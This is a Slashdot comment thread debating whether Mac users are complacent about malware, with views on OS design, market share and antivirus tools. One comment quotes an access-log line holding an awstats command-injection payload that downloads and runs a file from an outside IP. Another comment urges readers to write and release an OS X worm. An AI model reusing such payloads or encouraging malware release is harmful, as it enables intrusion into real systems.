Mac users 'too smug' Over Security?
wild_berry writes "Bill Thompson, one of the BBC's technology commentators and presenter of Go Digital on the BBC World Service, expresses his concerns that Mac users assume their safety in the face of trojans, worms, keyloggers and other malware. As a Mac user he is most concerned about the lack of herd immunity that is needed to stop a few infections becoming an epidemic, fully explained in his column week for the BBC technology site. Is he right, and what actual products exist for OS X that would protect against infections?"
This article was dead on.
My first ever encounter with this mentality was in high school when my music theory instructor told us that she loved her Mac and when I tried to argue with her about a number of things, she'd repeatedly reply with "No Mac has ever been hacked or had a virus on it."
Now, at the time, I was a young nooblet and probably should have let it slide but instead I snuck into her office and opened up her Macintosh's word editing software with the intent of some lil' bastardry. I found the option to replace a mistyped word with another that the user entered. After that, whenever she typed the word "the", it was replaced with "WARNING! VIRUS DETECTED! PULL PLUG FROM OUTLET AS SOON AS POSSIBLE!" Unfortunately, her son knew enough about computers to fix it so my fun didn't last very long (only one or two lunges at the wall).
Back to the issue--I think it is a grave mistake for anyone to ever feel 100% invulnerable when it comes to computers that are connected to the internet in any way. I would diagnose this as a standard case of a false sense of security. This is something that has plagued many people throughout history and often led to their downfalls.
What message am I trying to get across to Mac users? First, realize you're not invulnerable. Second, just browse around and look at what's out there for you to use as anti-virus and virus blocking tools. And if you don't want to, read some horror stories, perhaps that will motivate you to become aware of possible worms in your Apple.
My work here is dung.
It isn't so much that there aren't as many security holes in OSX and Linux (as well as other OS's), but that there aren't the hordes of people gunning to find them like there are in Microsoft (aka the evil empire) products.
Mac users are too smug about... everything ;]
Try this one. It works for me...
The guy is right, and security by obscurity doesn't really work for long. I suppose that the security of Macs rests in the continued success and growth of Windows.
I have a Mac and only have the firewall turned on. I suppose I'm off the bell curve since the Mac is for entertainment only and I rarely browse and never use email with it.
So, is there a profile of a Mac virus writer???
-a
Not another one of these articles.
If you want to talk about any audience that's too smug, talk about Linux. Linux is on more important machines, and yet everyone talks about how safe and secure it is, even though in some cases it's just not true at all. Yes, Open Source code is generally more secure, but the major parts that need to be secured in OS X are Open Source.
As far as I'm concerned, both Linux and OS X are going to be one hell of a lot safer than Windows for a long time running, and so I can rest and relax in my relative security thanks to Microsoft's inferior security practices.
"Victory means exit strategy, and it's important for the President to explain to us what the exit strategy is." G.W.Bush
The retailers who make this claim to those who may not know better.
A local Mac shop practically advertises that a Mac is totally secure and immune to viruses and spyware.
Every time I see one of their commercials I shake my head at the person's obvious lack of understanding of the issues at hand. It's one thing for a Mac fan to say they are secure due to their delusion... it's quite another for them to use their delusion as the basis for a sale.
It's just a shame that for them to be proven wrong, a lot of people and their PC's have to get hurt.
Help Brendan pay off his student loans
That's Mac OS X.
There's no substituting an OS that doesn't let the average user have administrator rights all the time.
The Windows users state that they don't need to run as administrator, but then ask them what hurdles they have to go through to make their software "just work".
Help! I'm a slashdot refugee.
In the computing world, there are clueless people, slightly more knowledgeable people, and the computer geeks. For the Mac crowd, I would gather the clueless and the computer geeks aren't smug since the clueless don't know what's out there and the geeks know that nothing is 100% secure. That leaves the slightly more knowledgeable people since their argument is that there hasn't been a virus reported since mac os x came out.
Regardless of what OS you use, you are never 100% secure. Much like safe sex, stick to stuff you know is safe and 99% of the time, you should be fine. If you do decide to venture into the internet's darker corners, then "protect" yourself as much as you can, and of course never assume that "it will never happen to me".
Monstar L
It will be a GOOD indication when malware writers start attempting to target Apple or *NIX. It will either mean that MS products are no longer the dominant player or it will mean that MS products are no longer a major security problem.
IANA Mac user, but, isn't there Word (or Microsoft Office) for Mac? What is the difference between Word on Windows and Mac that prevents those notorious macro viruses?
hilarious
As a Mac user, I'm not that worried about viruses, trojans, all that stuff. I felt the same when I was a Linux or a FreeBSD user. Why? The design of the operating systems makes the risk of infection very low. There may be a bug or two that come along at some point where a virus writer can exploit them to do something bad. Even with all that, the most it would probably be able to do is screw up stuff in my home directory. It's not something I'm going to worry about, and definitely not something I'm going to pay money to avoid when there's such a slim chance of anything happening. I use good judgement to determine what I should or shouldn't run, and I go from there.
How does the average user protect against the unknown?
When I get my new iMac ('free') I will be adding some extra security to the system. But the average user cannot do what I will be doing.
And as for the anti-virus software out there, except for dealing with Office viruses, and maybe System 6-9 viruses what is it supposed to protect against? It's snake-oil.
How do I know they even have staff on hand to deal with an outbreak where there hasn't been anything of significance in 5 years? (Yes, I heard about issues within the last 5 years, they were not particularly significant as they were risks, not outbreaks.)
How many people on Slashdot actually run anti-virus software on their Linux boxes? 5%?
A smug response there - well done!
I've been using Linux for nearly a year with no Windows on my PC. After that, I had to use Windows (developed .NET apps) and on the first day got 3 completely different viruses and managed to get my system completely screwed up. Before that I had a huge experience in Windows and never had any real problems with that kind of stuff. However it appears that I've completely lost awareness of the possible dangers of running every app without checking first.
So it appears that Linux and probably Mac users are less aware of malware and do some really careless things because the probability of getting a virus is extremely low.
"safer" OS
Safer? I guess, except in the past year Apple released more security and exploit fixes for OSX than Microsoft did for WindowsXP...
So again how is it a safer OS if these exploits existed in the first place?
Go stick your head in the sand until the great Mac worm hits that erases everyone's OSX drives. Then maybe people will realize that NO Operating System is completely safe. PERIOD.
Windows gets a lot of press because 95% of the world are using it, and it truly is targeted a bit more. Think about it, if you were going to write a virus to screw with the world, would you spend time finding a way to infect 5% of the world's computers or the other 95%?
When we hear about viruses, worms etc. ravaging Microsoft products it is easy for those of us who don't use Microsoft Products to become complacent because our system is not affected. When we become too complacent, and think that our system will never be affected, and never take steps to prevent infection, we will be in a world of hurt when a virus, worm etc. decides to attack whatever system you use. Like Solomon said "Pride cometh before a fall"
There are numerous anti virus programs out there for the Mac, but what virus are they scanning for? There are no known viruses for OS X, so how can they update the virus definitions if they have nothing to base it on? They've seen a vulnerability here and there, but nothing has been exploited yet. So it's like the chicken and the egg. You need an AV program to protect yourself from viruses, but you need a virus for the program to detect.
The day I see a virus on OS X is the day I buy an AV program.
Very nice link:
Viruses and the Macintosh
by David Harley
Version 1.6b: 7th January 2000
when was OSX introduced?
Anyway, Apple users shouldn't believe they are invulnerable.
But: this knowledge for 95% of the world is commonplace. Every Joe Sixpack thinks the macintosh/linux have their share of malware, viruses, because they're judging by their OS' standards. What this guy should also be saying is that there is no malware for the *nix's up to today. And I'm not talking about being on a blackhat's blacklist... So, hiding that these operating systems are safer today, is just spreading FUD...
People who live in glass houses should not throw stones.
How about a router with a firewall and the slightest bit of common sense?
It works here even with Windows XP.
If tyranny and oppression come to this land, it will be in the guise of fighting a foreign enemy. - James Madison
I don't know what Mac users most people hang around with but the ones I know wouldn't know security or virus protection if it came up and bit them on the nose. A lot of these folks can barely turn on their machines and fire up their browser and word processor. I realize that I'm just speaking for the people I know but those people are Apple's target audience.
Bill Thompson is right, but there is a much, much larger problem that's out there: cell phones. Cell phones are always connected to a large network. There are billions of them, and very few cell phones run any kind of anti-viral or anti-trojan software.
Although Bill may be writing to ride on the coattails of Apple's recent success, the Macintosh can get infected by a virus or a trojan program. In fact, some of the earliest computer viruses in the wild were found on the Mac. The Mac virus problem isn't as large as the Windows virus problem, but that's because there are many more Windows machines intermingling out there.
Any networked device, from routers to mainframes, from Bluetooth devices to cell phones to the XBox 360, may be vulnerable to malware. All need robust security.
My stock response: "The truth is, viruses just aren't a huge threat on the Mac right now. However, my religion precludes me from advising you to not buy anti-virus software."
It's not like you don't have options though. You can get anti-virus software from:
Symantec
Sophos
Intego
McAfee (Virex, included with a
And, of course, there's always Clam AV, along with the ClamXav front end for OS X.
...but architectural considerations need to be considered, too. There's no legacy baggage code from 1990 (a la WMF) to be worked around. Sure, we're smug, but that's because we live in today and not some theoretical tomorrow.
That being said, my Macs have Little Snitch installed. For those not lucky enough to be using a Mac, it's like Zone Alarm.
Is he right, and what actual products exist for OS X that would protect against infections?
Today, wild_berry was the billionth story submitter to place an annoying question at the end of his submission. Despite the pleas of nearly a million Slashdot users, wild_berry took part in the timeless tradition of Kindergarten Teachers and Coffee Talkers everywhere, and gave us a topic to discuss amongst ourselves.
What about YOU, what is your opinion of annoying questions at the end of postings? What do YOU think about them? Do YOU have any solutions to the problem?
I don't know who the guy is, but the article is completely useless. There are absolutely no hard facts in there. Please point us to ONE SINGLE virus, keylogger, adware, or any type of malware at all before making ridiculous claims like the old and completely bogus "it's just because of low market share". It's just not true. I haven't come across anything dodgy so far and I've _actively_ looked for it. Nothing except some shell-script with a highly hypothetical threat. Also, keep in mind that OS X users tend to get a large percentage of their software from centralized sources like apple.com and VersionTracker, which wouldn't post or quickly pull any infected software. IF there was any kind of outbreak, it would be all over the Mac-web within an hour at the maximum.
The BBC article says "After all, Mac OS is built on top of the Unix operating system and it, like its close relative Linux, has many well-known security problems that can allow it to be compromised.".
>100k viruses would be more correct...
I have a really elegant proof for Fermat's last theorem. If this sig was only a bit longer...
Sooner or later there will be quite a few people running spyware removers on their Macs thinking "Isn't this why I quit using Windows ?!"
;)
It's always the people that "jump ship" that end up drowning out in the cold, remember that.
Wanna fight ? Bend over, stick your head up your ass, and fight for air.
Looking at /var/log/httpd/access_log I typically find lines like these:
/NULL.IDA?CC... /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillok%3bc hmod%20%2bx%20killok%3b%2e%2fkillok;echo%20YYY;ech o| HTTP/1.1" 404 293
61.185.142.22 - - [15/Jan/2006:20:41:12 +0800] "GET
210.0.196.236 - - [16/Jan/2006:19:14:34 +0800] "GET
Why would I bother about this? There never is and never was an attempt at hooking up to my machine. Not a single virus, worm, trojan horse or macro virus in fifteen years of time.
There was a time when I downloaded the latest and the greatest in antivirus, but those apps were never of any use. They just consume valuable cycles and memory. I was just fooled by commercial forces to believe that I too could be hurt.
IF there is a virus or similar attacking Mac OS X, it will be known in no-time by the entire community, because there are a few outlets that almost all Mac users tend to for information. IF, and when, that happens, I will worry a little bit. But until then I will just let you folks use your Windoze crap machines loaded with warring apps to combat the attacks on your machines.
Do you wear a bicycle helmet? You are much more likely to be killed in a bicycle accident than your Mac is likely to be hit by a malicious attack. So, do you wear a bicycle helmet!?
I have spyware detection programs, snort, firewall, Little Snitch (network traffic filter), virus scanner, make regular backups.... etc. It's foolish to even step on to a computer... any and assume that you are safe. My personal opinion is those who keep blindly proclaiming that Mac OS X is a security haven should be held accountable for their words.
||| I still can't believe Parkay's not butter.
You're part of the crowd that didn't RTFA.
As a Mac user he is most concerned about the lack of herd immunity...
Moo...
I love these articles and the replies they have produced from the anti-Mac crowd. As expected, the one argument always seems to be something along the lines of - "The only reason Macs aren't riddled with viruses etc is because the virus writers haven't targeted them yet" Gee....that argument's been happening for a few years now and still, not *one* single script-kiddie or virus guru has taken the step towards big-time publicity by developing a virus that would take down OS X? Not one? They would get nothing but support from the PC community. The PC guys would love them! The only reason these nitwits are writing viruses is because they want to brag about it to their friends. Imagine if one of them writes one that brings the Mac community to its knees? Talk about bragging rights at the schoolyard then! But alas, the truth is, they can't do it. Or they would have by now. OS X is the only security needed on a Mac. Besides the built-in firewall. Oh, and if you're a teacher and own a Mac, don't be dumb enough to allow your idiot students access to your machine or they might do some harmless crap and misguidedly say "I told you so! Macs *are* vulnerable! Hardy har har!!!!" I'm a PC user at the moment but have spent time on linux and OS X. Anyone who would run anti-virus software on OS X is an idiot.
If you are using Mac vs. Windows you are definitely safer. Even if you are using a Windows system with all the greatest and most expensive security tools out there. First you have the OS Level of protection (which the extra Windows security tools tend to fix some of), which prevents applications running as Root or Super User unless it notifies the user and they will need to retype in their password (which could still be a problem, but at least the user would know what they did and when so they could possibly fix it), and unlike Windows and a lot of Linux Distros, it is out of the box with all outside ports closed.
But you can still put malware on a Mac. Just attach it to another application and when they install it, it asks for a password and bang your malware has full access. Some of the new features shown at the last Mac World scare me a little too. Like allowing people to email links when click opens up iPhoto etc... where there could be a flaw in the graphic renderer to cause a buffer overflow and run code.
The second level of protection is just the fact that a lot less people have a Mac than a PC. If you want to cause havoc then you target Windows because the Windows base is large enough to allow viruses and malware to spread. Apples are more dotted. And sending Mac malware may not have the numbers to spread.
All in all I would feel safer using a Mac with a raw connection to the internet vs. a Windows PC behind a well maintained network, with all the patches and security tools. Because the chances are the Mac will catch on fire from a faulty fan, than get a security compromise (without changing the original out of the box setting).
If something is so important that you feel the need to post it on the internet... It probably isn't that important.
You're not vulnerable if you're not a target. Macs are not targets. And I fix all computers, Windows, Linux, Macs. Mac people are no more or less smug than those other users. Most Windows people don't have a clue about firewalls, virii, trojans, or worms fyi. Computer users are all the same. They just want something that works. BTW I haven't had to remove a virus, trojan, or a worm from a Mac yet. I've done that for Windows machines all the time and make good money doing it. You do the math.
> So again how is it a safer OS if these exploits existed in the first place? Go stick your head in the sand until the great Mac worm hits that erases everyone's OSX drives. Then maybe people will realize that NO Operating System is completely safe. PERIOD.
If you look at the OS X `exploits' (quotes because that's not what they are), most of them are holes in software that doesn't even run by default. Are you using Apache 2 (not 1.3) on your desktop? If so, the security update will prevent a malicious trusted (!) proxy server from crashing one thread of your Apache instance.
If you're using Windows, you need the security update to prevent the web browser from downloading an image that puts a rootkit on your machine.
It's all about severity, and OS X's "holes" just aren't that bad. However, MS consistently manages to provide a multitude of auto-infection routes to virus writers.
My other car is first.
I distinctly remember my first virus way back when the computer was still a bit of a novelty and the 200MB disk was considered godly (I distinctly remember my Dad saying that we'd never fill it up in our lifetime). When my family got our first Mac Plus, I thought I was in heaven - I could draw using MacDraw and write up reports, but most importantly I could play all sorts of cool games like Dark Castle and Dungeon of Doom. Of course it didn't take me long to figure out that my friends and I could swap games, stretching our very limited allowance. Everything was great, until one day I accidentally infected our computer with one of the nVIR viruses. That was an experience I'll never forget - my dad feared for his computer, I feared for my life. The computer survived, and so did I (barely), but it's safe to say that I've been paranoid about viruses ever since.
The first virus I ever got was on one of the original Mac models - the little ones with the 9" screen. It was kind of cool actually. You put your floppy in to save a document - MS Word in my case, and it would transfer onto the floppy. And then, when you go to use another Mac, it spread to that one. No need for the Internet.
My god what a moron you are. Ok so imagine that you, an idiot, is sitting at home writing a virus and he thinks to himself 'well I could write a virus for 95% of the computing market or I could write a virus for the 5% that have never been hacked and become infamous across the web... No wait I'll write another virus for that 95%' FFS it's not like Apple are even low profile anymore, big enough to take potshots at no problem if it were that easy.
Ok you dumb ass, look at what your comment says about patching. Apple releases a lot of security patches AND there are NO viruses, Windows releases less patches AND has MANY many many viruses. So what Apple are relying on security through obscurity? Or maybe they are patching their OS all the time to make sure it stays 100% secure unlike Windows which is at the stage of 'damage control'?
P.P.S. You don't even know how computers work do you? What are you doing here? A Mac virus that erases the hard drive? Macs don't even run in root 99% of the time!!!
Two tears in a bucket. Motherfuck it.
good user interface and it will be better integrated with my other applications. So there...
The Mac is not immune to viruses or spyware, it's just that they aren't that prevalent yet. I would say that OSX is resistant to malware simply by design.
The really big benefit to OSX (over Windows) is that if a user executes malware it does not infect the entire system by default. Sure, things can be done to destroy data or spy on the unfortunate user but the rest of the users on the system are spared of the issue and any potential tracking malware or botnet application is not running after the problematic user is logged off.
This is why I have no issue about letting my non security conscious friends have an account on my systems. There is little that they can do to cause me problems. Should one of them get infected with a hypothetical malware then I can just recreate their account. No big deal.
True, social engineering will always break any software security model but it does no good if they are not administrators.
I wouldn't even consider letting them do the same thing with Windows even under a limited account on a completely patched system. There are just too many holes.
There have been HUNDREDS of articles like this over the last few years, especially since Apple moved to OS X. And every time the tone is, that Mac users have no idea how dangerous computing is, and have too much trust in Apple and OS X to be inherently virus/malware/spyware/trojan proof.
The problem for me is, that I see nothing to shake that trust in OS X.
I switched to OS X machines after years of administrating a collection of around 100 PCs in two internet cafes, and 100 PCs running Windows being used by thousands of clueless users entails massive amounts of work and hardship to keep them virus/malware/spyware/trojan free. We had a few Mac machines, and all they ever needed was to have 'software update' run once in a while.
There's no point telling people that they have too much faith in OS X's powers to keep out the hackers and viruses, when there are STILL no viruses for Macs, still no malware apps, still no trojans, still no worms. What can they expect articles like this to make users do? Run anti-virus software everyday? What the hell would it be looking for?
Linux is a damned secure OS, at least as good as MacOS X. Yet, you find Linux sysadmins often talking about relatively paranoid security measures when talking about keeping their systems safe. Linux has a good security culture. (The same could be said for the BSDs.)
The issue, in my eyes, is not whether MacOS users are going to be immediately vulnerable to any virus outbreaks because they're not securing their computers properly - it's whether this whole "I use Macs, therefore, I am impervious" is fostering a culture of bad security practices in the Mac community. A good OS is only half the battle - you need to make sure you have good security practices, too, if you don't want to get owned.
-Erwos
Plausible conjecture should not be misrepresented as proof positive.
Wouldn't it have the inherent vulnerabilities of its base OS, which IIRC is BSD?
"Mac OS may not have the gaping holes that let viruses spread, but worms, spyware and even keyloggers are out there."
Once Macs hit primetime and begin to take a larger market share of the personal computer industry, then we'll start to see some serious viruses. Won't be long. Hackers will find holes. It just isn't worth their time and effort right now to affect a small percent of computer users.
A couple of men went camping. They camped at a remote site, new to them, where they didn't really know everyone else who was camping there. After setting up, one of the men put a little, teeny tiny lock on their tent flap door. His friend looked at the flimsy lock and remarked, "That lock is nowhere near good enough to keep out anyone who might want to get into your tent! Why, I bet I could get through that lock in less than a minute.". The first man replied, "The lock doesn't need to be the best lock in the world; it just needs to be better than that guy's" -- and he pointed to the tent next door, without a lock at all.
The point being, surely Mac OS X is not the end-all and be-all of security, but Apple has by all accounts gotten increasingly serious about security as Mac OS X has matured. It's not ever going to be possible to have a 100% perfect level of security, but as long as it's better than that guy's (points to Redmond, WA), in most people's minds it'll be the most secure commercial OS on the market. ~jeff
Security?!? Mac users are too smug about everything.
You thought my name meant what? How very dare you!
I imagine they are pretty few and far between.
I've always understood the motivation of virus/trojan writers is either make a 'name' for themselves amongst their peers or to profit illegally in some way (by stealing information, creating botnets etc.).
If these are their primary motivations, they are going to go after the biggest user base and the software environment with the most potential points of weakness (i.e. Windows).
Windows has a massive codebase and the goals of flexibility, backward-compatibility and ease-of-use also add to the potential 'exploitability' of the platform.
Viruses, worms and trojans can (and have) been written for every flavor of MacOS and *NIX, but what's the point, other than for proof of concept? Like advertisers, virus writers go for maximum exposure, and right now, that means Windows.
I don't automatically knock Windows at every turn and I think, on the whole, it does its job very well. But it's the 'weakest link' principle. With such a large castle to defend, there are many more points of vulnerability. The WMF exploit (a legacy code weakness that was never properly reviewed) points this up nicely.
If I were some kind of no-life blackhat, or a criminal, I wouldn't be wasting my time targeting OS-X or Linux when there are far more lucrative prospects.
Are you arguing that Windows is safer??? It may just be that Windows is targeted more, but Windows is definitely a cesspool of all kinds of malware.
What exactly are us Mac users supposed to be doing about viruses that don't exist yet?
i let antivir check incoming mails for virii (yeah, grammar nazis, spell that!) and i'm a little bit disappointed because i had only one positive in ~2.5 years although i'm getting ~ 100*spam/day
what user owns all the documents you create?
To paraphrase a mediocre movie, Show Me the Virus!
There are no known viruses for OSX, there are theoretical exploits and we may not be safe forever, but today there are no known viruses for OSX. These articles are always theoretical. I can copy a PC virus with my Mac, I can open a MSOffice Macro virus left over from the 1990's (those don't do much damage anymore), but I can't run and propagate a virus on my OSX machine.
I certainly do not think that I am immune in any sort of percentage. I have a limited understanding of how security is implemented and some, but minimal, knowledge of how to make my machines locked down.
I understand that by connecting to the internet and by using darwinports and fink in order to add applications to my machine I have opened up significant vectors for mischief, though independent checksums mitigate that risk to a degree. I understand rationally that there is only so much the operating system and applications writers can do for security and the rest is up to me.
But, I don't accept that operating system security should be a required after-market accessory. And, when you look at systems by Microsoft, Apple, FreeBSD, NetBSD, OpenBSD, RedHat, Novell, Debian, etc., who seems to be uniquely arguing that it should be.
So, am I immune using my Macs. Nope. Based on my understanding of how security should work and my observation as to what is actually getting infected, I still feel safer using Macs. I'm prepared to reassess that position as soon as new information arrives.
But, if you define "bang" as the most publicity for your exploit, then surely there must be something to authoring the first MacOS X virus and managing to get it spread in the wild. Granted, there is the security through obscurity/low market share, but come on. I imagine if someone managed to write a successful virus or worm for OS X and got it to spread, every news agency would report it (since they report just about anything Apple, and something like this would be big), every "geek" site would cover it like mad, the blogsphere would go just about crazy, etc.
Certainly, that is worth a significant amount of "bang", isn't it?
"Empathise with stupidity, and you're halfway to thinking like an idiot." - Iain M. Banks
Because most weren't critical vulnerabilities and there are no exploits. Show me an exploit for a Mac OS X vulnerability. Now, show me one in the wild. Can't? The only thing you have to do to wipe the smug look off a Mac user's face is to release an exploit in to the wild. Go ahead. What are you waiting for?
If just one person who thinks Macs are just as vulnerable as PCs would just write a worm/trojan/virus, we could end these f*@&!#g trolls and all agree that security is hard. Really, please, someone write an OS X exploit and spread it. Make it benign if you're uncomfortable with writing viruses. Just get something out there.
I'd like to see it just so people will stop using the lame "there are more Windows PCs" arguments. I'm sorry but this whole issue has gotten so blown out of proportion that the first person to show a really bad Mac vulnerability with an exploit would be on every geek blog and quite possibly the NYT. You'd be f*@&!#g famous.
I think the key part of this article is dead on. That Mac users are assuming that they're secure because of their OS. I'm even seeing it here. "There hasn't been a virus for Mac OS X!" and so on.
The present "Security by obscurity" is not an excuse for not paying attention to security! I'm an "old geek," and I can remember people telling me back in the early '90s that they couldn't possibly have a virus, since they were the only person who used their computer. That was just before I found and cleaned an astonishing number of BSVs and file viruses off their computer. "Oh, the kids were playing games with their friends!"
There's an old saying that holds true here: "When you assume, you make an ass out of U and me." Assuming you're secure just because you're running Mac OS, Linux, or even Amiga (yes, it's still out there!), without paying attention to security is a sure way to get bit - which is what is going to happen, sooner or later.
I get regular security vulnerability email alerts all the time. Just today there was a long list of potential problems with 10 different flavors of Linux, HP-UX, Cisco, OS/400, Z/OS and of course Windows.
Now the issue is, how bad is that? And the other question is what is the cost - benefit of fixing it?
Many of the vulnerabilities in the alert I alluded to have the potential to be serious enough to warrant your attention but this assumes that you already have NOTHING in place to protect yourself, that you've effectively not implemented any security infrastructure whatsoever. The probability of this is quite low.
But - and this is the big issue with Windows, your exposures surface out of EVERY SINGLE ordinary everyday common task you employ the machine to do. It would be as if every Cisco vulnerability surfaced specifically and only when it routed packets and only because it routed packets.
Therein lies the difference.
In the Mac world, no one is seriously suggesting that their BSD based OS is de facto immune from problems. What they're arguing convincingly is that those problems when they arise will arise out of non common tasks and obscure problems that typically stem from operating your machines in a very nonstandard way to begin with. For instance the ordinary Mac user could, if they were motivated, run as root all day everyday. But why would they? That's a nonstandard operation mode. Moreover the common problems you do see in the Mac world won't ordinarily occur because of executing common tasks that ordinary users employ their machines to do. You won't see many vulnerabilities exploited the same way that simply using AOLIM or Limewire or reading a rich email or any of the other innumerable problems in Windows stems from.
There's no substituting an OS that doesn't let the average user have administrator rights all the time
Yes, because as we all know the really valuable data on the computer is the OS and installed programs. You know, the stuff that can be replaced in a few hours.
All that user data that's completely and utterly irreplaceable? Worthless. Who cares if a virus or trojan destroys it? And it obviously doesn't matter if a keylogger running in userspace sniffs out all your bank passwords and sends them to a 3rd party (what, you don't need admin privs to open a socket?!?!), because, hey, the OS itself is still secure!
The amount of real damage that a virus, worm, or trojan can do is not substantially affected by whether or not it can get administrator privileges. It may be easier to remove, but that's about it. And, frankly, if your average user runs in a lower privileged account then they're likely to get used to typing in the admin password when prompted, without even thinking about it.
And that's what it ultimately boils down to -- the user. Clueless users will get hit by crap all the time regardless of the platform. Clued users will not, again regardless of the platform. I've been using PCs for over 20 years now, most of that time on DOS or Windows (although I've also used OS/2, Linux, FreeBSD, Solaris, and several others) and I've been hit with a virus exactly once -- and that was about 18 years ago. It infected very little too, because I was running a virus scanner that caught it quickly (back in the days when McAfee was free(ish) for personal use). Nor have I ever had to remove spyware, malware, etc. on any of my personal or work systems.
OS X has a rather high percentage of non-technical users, just as Windows does. Do you really think that they're immune to doing stupid things?
"The present "Security by obscurity" is not an excuse for not paying attention to security!"
Sorry, but what the fuck are you talking about? Mac OS X is based on decades-old BSD code, substantial parts of the core OS are open source and you can go right ahead and look at them over at the Darwin project. How's that for "obscurity"? Cocoa, the API for developing OS X apps, has been around in one form or another since NextStep and is fairly mature, as well. The parts on top of Darwin are _extremely_ stable and so far, haven't been exploited one single time.
Windows is such an easy target.
While there are definitely advantages in living in a huge city (public transportation, events that you can't get in a smaller town, etc.), there is (at least) one huge disadvantage, i.e. crime. Crime is (generally) proportional to the population density of an area. That is, for the sake of our analogy, the more dense a population, the more services and features offered for that population, but the more crime occurs.
So you have WindowsTown, a huge megacity that dwarfs even the next largest town by orders of magnitude (MacCity), and which offers many amenities that are not found in other cities, but there is an enormous crime problem in that city. So much so, in fact, that just about everybody has armed guards with them at all times, and every apartment has the equivalent of a bank's security system. In fact, the problem is so bad that WindowsTown's city government, run by the illustrious billionaire William H. Gates III, is instituting a crackdown on crime and terrorism by controlling what everyone can do in WindowsTown (the project is codenamed Palladium). This will likely help enormously with the crime and terrorism problem, but civil rights groups are concerned that the system will be abused to the advantage of the current government and its allies (generally very large businesses), at the expense of the average consumer and smaller parties and businesses. The citizenry of WindowsTown might be somewhat concerned about this new program, but generally haven't heard much about it at all (aside from Gates' promise to end crime and terrorism, which, of course, resonates with them). They may know that there are other cities out there, but are concerned (and somewhat rightly so) that their prefab house in WindowsTown will be hard to move to another city, and that their car (which, like their house, was designed from the ground up to run in WindowsTown and which will likely not work in another city!) will no longer work. So, if they even know about other cities, they are generally afraid of leaving the "comfort" of WindowsTown, so they stay, the population stays up (despite the crime which, given a citizenry not bound to any specific city, would cause many to leave such a crime-ridden city!), and the crime rate stays up.
Additionally, we have MacCity, which has a good-sized populace. It's the second largest city on Desek Topia Planet, but has a very, very small slice of the total population of the planet. It is almost completely crime-free, and has a pretty good public transportation system, and you can even (somewhat often) get to see a good number of the more popular concerts and shows from WindowsTown. One of the most popular models of car ever--made by Mayor Gates' company--has a model that is pretty close to the WindowsTown version (but requires a separate purchase, of course). Many from WindowsTown argue (and possibly rightly so) that MacCity is so crime-free because it's so small, and use this to justify why they won't move from WindowsTown to MacCity. Those in MacCity, however, generally disagree and argue that the architecture of MacCity itself prevents crime. This is a great source of debate, but it remains mostly academic, as the vast majority of WindowsTown residents
As a side note (which, notably, very, very few from WindowsTown know about), there is the Federation of Leenucks. It is a federation of a number of cities which call themselves "distributions." Reports on the FoL back in WindowsTown and MacCity vary widely between it being a gleaming utopia (complete with flying cars!) to a complete breakdown of law and order, wild-west style. There's certainly almost no crime in the FoL. However, th
--
Given enough personal experience, all stereotypes are shallow.
While no system is 'secure', I think it's certainly defensible to say that one OS is more secure than another when there are no viruses for the Mac and every other week or so, there's a CERT Advisory about some virus that will "allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service". The last Advisory was for a Quicktime vulnerability, but these are advisories, not viruses. (i.e. advisories about a vulnerability for which a virus can be written.)
So, there are vulnerabilities. Apple fixes these and pushes out patches, just as RedHat, Sun, HP do for ssh, bind. So, it's wrong to say that the Mac is invulnerable, but I certainly feel a sense of smugness to have an OS that hasn't had a virus written for it.... yet.
Cars. While car safety is going up the number of accidents is not going down as expected. Deaths are but that could easily be caused by improved healthcare. So what is happening? Well while cars have become safer and safer they also become easier to drive, or rather they haven't become easier to drive at all but they are seen as easier to drive.
Nobody would take a T-Ford to 180 km per hour at night. The latest BMW? No problem. Usually it ain't a problem. Except when it goes wrong and modern tech is asked to keep the human body safe when 2 tons of metal lose traction and meet a bridge support.
There are some road safety experts who suggest that one of the dangerous developments is quiet cars. In old cars you know your speed because the roar of the engine and the whistling wind grow intolerable. The latest cars however remain very quiet and can really distort your sense of speed. If you've ever been on a high-speed train or worse an aircraft you know the feeling.
So how does this relate to computers? Simple, a lot of the bugs, activeX on windows and that widget thing from the article that affected OS-X are there to hide the difficulty of driving. Just as a modern car reduces the feedback so do solutions that allow software to be installed with no or minimum interaction.
That whistle of the wind, the roar of the engine, the wheels almost losing traction are the feedback signals to tell me I am going too fast, slow down before you lose control.
Same with install screens. The more invasive an install is the more warnings it should throw up (just as driving too fast on a bad road will feel worse than driving too fast on a good road). You want to install a program that only runs for you, installs no hooks and does not modify anything or communicate with anything? Just 1 screen. It installs for you and allows writing to any file owned by you? 2 screens. It installs itself for you and allows writing to any file and runs in the background? 3 screens.
It is like those signs in bugs bunny comedies that tell him to turn back now, we mean it, really mean it, don't do it.
Computers ain't easy to use and if you get it wrong there is a pool of 6 billion people who are out to get you. Now like cars you can make computers very easy to use but then you better make sure you do not exceed the recommended maximum usage. You can drive a car with total lack of feedback perfectly safely. At about 5 miles per hour. You can have a computer with 0 click install software perfectly safely, just limited to microsoft.com/apple.com
As long as software makers keep making things easy and users keep accepting it we will have people getting it wrong. Just like every day somebody gets it wrong with their car and crashes for no other reason than that they misjudged the ease of use.
I have only once been affected by a virus and that is a machine I was given pre-installed and I discovered it and was given the task of cleaning up after figuring that all the machines in the office had been affected.
Am I brilliant? No. Am I a social outcast who doesn't get the latest viruses in his email box? Yes. But mostly I do not accept an easy to use computer. I want to speed (download porn/warez) and know that the price for that is that I gotta be in complete control of my computer. Just like F1 drivers are in control of their car (except they get chicks and money for it).
MMO Quests are like orgasms:
You may solo them, I prefer them in a group.
I haven't seen anyone mention the profile of those who write these malicious programs. They come from the open-source fanatics who think they should own the world with their free software. They use malicious tactics to destroy the 'competition' and then brag about how their open source apps are secure. NEWS FLASH they aren't going to write malicious software that hurts their own work!!!
Also remember that Mac OSX is based on BSD...open source software. It will remain secure as long as BSD is secure. Yes there are malicious programs out there that will attack MACs and *nix products but these are typically aimed toward the web servers and are more attacking the Internet than a specific OS.....
I do realize that my 'profile' is not 100% accurate but think about it, who else would have the expertise and knowledge to write such things?
OS X is in no way "immune" to that kind of attack, and a user can still find themselves hit, their friends hit, and all of their personal files deleted.
What OS X DOES have is protection against the virus digging deep into the system because of OS X's clean authenticate to administrator model. However, most of the damage can already be done with user privileges.
You very obviously didn't read the article you just linked to (or my post, for that matter). I am talking about _actual_ exploits, not something that a very, very obscure "security research firm" reportedly "received by email" but won't show anybody because whatever. Something that might hit me or you. Something that has significance beyond using it in silly slashdot discussions.
